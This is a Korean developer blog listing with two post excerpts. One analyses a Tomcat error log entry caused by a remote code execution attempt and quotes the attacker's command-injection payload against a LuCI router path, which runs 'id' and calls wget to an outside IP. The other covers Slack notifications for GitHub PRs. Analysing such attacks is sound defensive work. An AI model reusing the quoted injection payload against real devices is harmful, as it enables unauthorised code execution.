승팡의 개발일지

최근 토이 프로젝트에 Grafana와 Loki를 활용해 로깅 및 모니터링을 설정하던 중, 흥미로운 에러 메시지를 발견했다.이 에러는 단순히 유효하지 않은 문자 때문에 발생한 것처럼 보이지만, 자세히 살펴보면 원격 코드 실행(RCE) 공격 시도로 인해 발생한 것을 알 수 있다.이번 글에서는 이 에러의 원인과 톰캣이 이를 어떻게 방어하는지에 대해 살펴보자.프로젝트에서 발견한 에러java.lang.IllegalArgumentException: Invalid character found in the request target[/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+http%3A%2F%2F103.149.28.1..

공부/DevOps 2024. 6. 9. 20:06

여러명이서 사이드 프로젝트를 진행하다보면 사는게 바빠서 PR이 올라왔는지 안올라왔는지 확인 못할때가 있다. 일일히 PR올렸다고 말하기는 뭐하니 Slack을 이용하여 쉽게 PR이나 이슈에 대한 알림을 받도록 했다. Github app 설치 Slack에 Github app이 설치되어 있지 않다면 설치해야한다. 왼쪽 상단에 더보기를 눌러서 앱을 선택한다. 위에 사진과 같이 추가 버튼을 눌러서 액세스 권한을 설정에 맡게 허용만 하면 준비는 끝이다. Project Repository와 연결하기 Github 알림을 받을 채널로 이동한 후 아래와 같이 알림을 받을 Repository를 구독하겠다는 명령을 한다. Connect Github account를 하라는 메시지가 나오고 Github 계정으로 로그인하여 인증번호..

공부/DevOps 2023. 9. 5. 22:25